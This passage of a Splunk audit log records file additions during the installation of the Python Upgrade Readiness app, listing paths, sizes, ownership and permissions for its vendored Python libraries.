action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_imports_six.py", isdir=0, size=2470, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.021, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_import.py", isdir=0, size=802, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.017, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_filter.py", isdir=0, size=615, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.014, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_file.py", isdir=0, size=427, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.010, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_dict_six.py", isdir=0, size=1271, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.006, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_classic_division.py", isdir=0, size=647, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:47.003, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/fix_basestring.py", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.999, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes/__init__.py", isdir=0, size=1747, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.793, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/main.py", isdir=0, size=8291, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.789, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.786, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize/__init__.py", isdir=0, size=3462, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.782, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe/_speedups.c", isdir=0, size=9884, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.778, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe/_native.py", isdir=0, size=1873, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.774, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe/_constants.py", isdir=0, size=4690, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.770, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe/_compat.py", isdir=0, size=558, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.766, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe/__init__.py", isdir=0, size=10126, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.660, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/checksumdir/py.typed", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.656, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/checksumdir/cli.py", isdir=0, size=1668, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.651, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/checksumdir/__init__.pyi", isdir=0, size=521, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.647, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/checksumdir/__init__.py", isdir=0, size=2120, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.643, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/top_level.txt", isdir=0, size=11, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.639, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/WHEEL", isdir=0, size=109, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.635, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/RECORD", isdir=0, size=1197, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.631, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/METADATA", isdir=0, size=3570, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.627, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/LICENSE.txt", isdir=0, size=1475, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.621, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.516, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/top_level.txt", isdir=0, size=5, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.510, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/entry_points.txt", isdir=0, size=586, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.505, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/WHEEL", isdir=0, size=93, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.498, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/RECORD", isdir=0, size=3806, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.494, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/METADATA", isdir=0, size=2438, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.488, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/LICENSE", isdir=0, size=1097, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.483, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.480, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info/AUTHORS", isdir=0, size=282, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.476, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/turbogears.py", isdir=0, size=2165, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.472, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/pygmentplugin.py", isdir=0, size=4951, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.468, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/preprocessors.py", isdir=0, size=576, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.465, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/linguaplugin.py", isdir=0, size=1954, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.460, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/extract.py", isdir=0, size=4616, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.456, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/beaker_cache.py", isdir=0, size=2599, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.453, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/babelplugin.py", isdir=0, size=2138, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.449, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/autohandler.py", isdir=0, size=1885, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.446, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.341, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/util.py", isdir=0, size=10993, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.338, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/template.py", isdir=0, size=26411, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.334, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/runtime.py", isdir=0, size=28020, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.330, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/pyparser.py", isdir=0, size=7789, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.324, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/pygen.py", isdir=0, size=9938, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.321, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/parsetree.py", isdir=0, size=19411, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.317, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/lookup.py", isdir=0, size=12718, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.313, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/lexer.py", isdir=0, size=16926, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.309, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/filters.py", isdir=0, size=6063, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.305, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ext", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.301, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/exceptions.py", isdir=0, size=13003, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.295, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/compat.py", isdir=0, size=5228, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.289, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/codegen.py", isdir=0, size=47881, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.286, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/cmd.py", isdir=0, size=2471, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.282, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/cache.py", isdir=0, size=7736, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.278, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/ast.py", isdir=0, size=6789, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.274, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/_ast_util.py", isdir=0, size=20414, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.270, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako/__init__.py", isdir=0, size=243, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.066, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunkbaseapps.csv", isdir=0, size=417049, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.062, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.059, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six.py", isdir=0, size=32452, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.055, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/six-1.12.0.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.050, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/pura_version_bifurcator.py", isdir=0, size=6074, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.045, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/pura_utils.py", isdir=0, size=3338, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.042, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/pura_logger_manager.py", isdir=0, size=1402, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.037, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/pura_consts.py", isdir=0, size=17576, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.031, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/past", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.028, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/markupsafe", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.025, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/mako", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.022, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.018, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libmodernize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.015, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libfuturize", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.012, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.008, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then-0.1.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:46.003, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/futures_then", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.998, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.995, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/checksumdir", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.991, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.987, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/MarkupSafe-1.1.1.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.980, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/Mako-1.0.12.dist-info", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.773, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.769, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_unpacking.py", isdir=0, size=5946, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.765, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_throw.py", isdir=0, size=835, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.761, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_raise_.py", isdir=0, size=1225, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.758, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_raise.py", isdir=0, size=1099, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.754, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_printfunction.py", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.750, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_next.py", isdir=0, size=1233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.746, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_newstyle.py", isdir=0, size=888, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.742, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_metaclass.py", isdir=0, size=3260, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.738, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_memoryview.py", isdir=0, size=551, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.735, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_kwargs.py", isdir=0, size=5991, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.731, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_imports2.py", isdir=0, size=8580, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:45.726, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py2/pura_libs_utils/libpasteurize/fixes/fix_imports.py", isdir=0, size=4944, 